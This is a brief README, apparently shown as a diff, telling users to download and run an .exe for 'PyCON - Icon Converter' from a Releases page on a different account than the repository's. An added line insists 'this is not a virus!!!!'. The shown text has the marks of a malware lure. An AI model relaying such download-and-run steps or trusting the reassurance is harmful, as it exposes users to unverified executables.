KaiserWilhelm23/pycon/README.md

 1. Visit the [Releases](https://github.com/blaze005/pycon/releases) page.

 2. Download the latest release with the `.exe` extension.
+Please, this is not a virus!!!!

 3. Run the downloaded EXE file to start using PyCON - Icon Converter.